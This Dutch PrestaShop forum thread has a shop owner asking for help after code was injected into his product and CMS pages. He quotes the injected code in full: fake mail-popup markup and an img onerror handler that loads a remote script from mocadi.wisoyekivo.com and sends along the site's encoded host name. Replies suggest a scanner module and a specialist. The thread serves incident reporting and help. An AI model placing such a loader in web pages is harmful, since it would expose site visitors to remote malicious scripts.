Jump to content

Recommended Posts

Goede Middag iedereen,

Prestashop versie 1.6.1.24

Sinds deze week kan ik na het aanpassen van de prijs in de product fiche deze wijziging niet meer op te slaan. Dit is van toepassing op alle wijzigingen die men in de fiche wil doorvoeren (bvb nieuwe foto uploaden of beschrijving aanpassen.

Er verschijnt een error dat de veld beschrijving en korte veldbeschrijving ongeldig zijn in de verschillende taal velden. (zie bijgevoegde foto)

Bij deze beschrijving staan plots velden (What do you want to do ? - New mail - Copy + InputBox) (zie omcirkelde rode lijnen op bijgevoegde foto). Ik weet niet waar ze vandaan komen.

Heeft dit misschien te maken met de melding die deze week werd uitgestuurd door prestashop dat de software kon gehackt worden (Critical Security Vulnerability in Prestashop Modules)

Kan iemand mij misshien helpen hoe dit kan worden opgelost zodat deze velden verdwijnen en de productfiches opnieuw kunnen worden geupdated.

Op alle pagina's met tekst (CMS blokken - beschrijving van product,... staat dit in de broncode) :

<div id="mailtooptiepopupMailModal" style="z-index: 1;">
<div id="mailtooptietoPopupModal">
<div id="mailtooptiemodalTo"></div>
<div id="mailtooptiemodalToPopup">What do you want to do ?</div>
<a id="mailtooptienewAppButtonOpen"></a>New mail<button id="mailtooptieclipboardCopyButtonEmail">Copy</button><textarea id="mailtooptieclipboardArea"></textarea></div>
</div>
<div><img onerror="var s=document.createElement(&quot;script&quot;);s.type=&quot;text/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;//mocadi.wisoyekivo.com/scripts/js?k=5de23176f3c82d74138b4567&s=&quot;+encodeURI(btoa(window.location.host))+&quot;&ns=true&quot;;document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);" /></div>

 

 

Met vriendelijke groet

Rico

Productfiche_001.jpg

Productfiche_error.jpg

Edited by Rico_001 (see edit history)

Share this post


Link to post
Share on other sites

Heel vervelend!

Ik ben geen techneut, maar als ik naar je bericht kijk is het eerste wat in me opkomt: Weet je waar dit vandaan komt? mocadi.wisoyekivo.com/scripts/js?

Met in het achterhoofd het veiligheidslek wat in een aantal modules is gevonden zou ik persoonlijk eerst de volgende module uit deze post installeren. Deze checkt of er de genoemde bestanden in je webshop zitten die voor een veiligheidsprobleem kunnen zorgen.

In deze post kun je die gratis module vinden: 

 

Als deze module deze bestanden vind, kun je ze direct verwijderen met deze module. Maar het betekend ook dat de kans bestaat dat er iets mis is gegaan. In dat geval kan ik eigenlijk alleen adviseren om een specialist in de arm te nemen die je shop checkt en opschoond. 

Share this post


Link to post
Share on other sites
12 uren geleden, Curious zei:

Heel vervelend!

Ik ben geen techneut, maar als ik naar je bericht kijk is het eerste wat in me opkomt: Weet je waar dit vandaan komt? mocadi.wisoyekivo.com/scripts/js?

Met in het achterhoofd het veiligheidslek wat in een aantal modules is gevonden zou ik persoonlijk eerst de volgende module uit deze post installeren. Deze checkt of er de genoemde bestanden in je webshop zitten die voor een veiligheidsprobleem kunnen zorgen.

In deze post kun je die gratis module vinden: 

 

Als deze module deze bestanden vind, kun je ze direct verwijderen met deze module. Maar het betekend ook dat de kans bestaat dat er iets mis is gegaan. In dat geval kan ik eigenlijk alleen adviseren om een specialist in de arm te nemen die je shop checkt en opschoond. 

Goede Middag,

Bedankt voor uw reactie. Ik weet inderdaad niet waar dit vandaan komt. (mocadi.wisoyekivo.com/scripts/js?). Ik heb gisteren geprobeerd om een backup terug te plaatsen van versie 1.6.1.15 van enkele maanden terug, maar dit was ook geen oplossing. Het probleem blijft bestaan. Ik heb daarna opnieuw de backup van versie 1.6.1.24 terug geplaatst. Ik weet echter niet in welke bestanden ik moet zoeken om die broncode die het probleem veroorzaakt te liquideren. Ik heb ook de geadvizeerde module geinstalleerd maar hiermee werden geen geinfecteerde modules gevonden. Ik denk dat de hostprovider al software heeft laten draaien om de directories te laten verwijderen.

Edited by Rico_001 (see edit history)

Share this post


Link to post
Share on other sites

Persoonlijk denk ik dat het beter is om even een specialist hier naar te laten kijken. Wacht hier ook niet te lang mee, want het is een erg raar verschijnsel wat je laat zien en beschrijft.

Je zou bv @Adeko.nl voor kunnen vragen, maar er zijn meerdere prestashop partners die je hierbij kunnen helpen.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More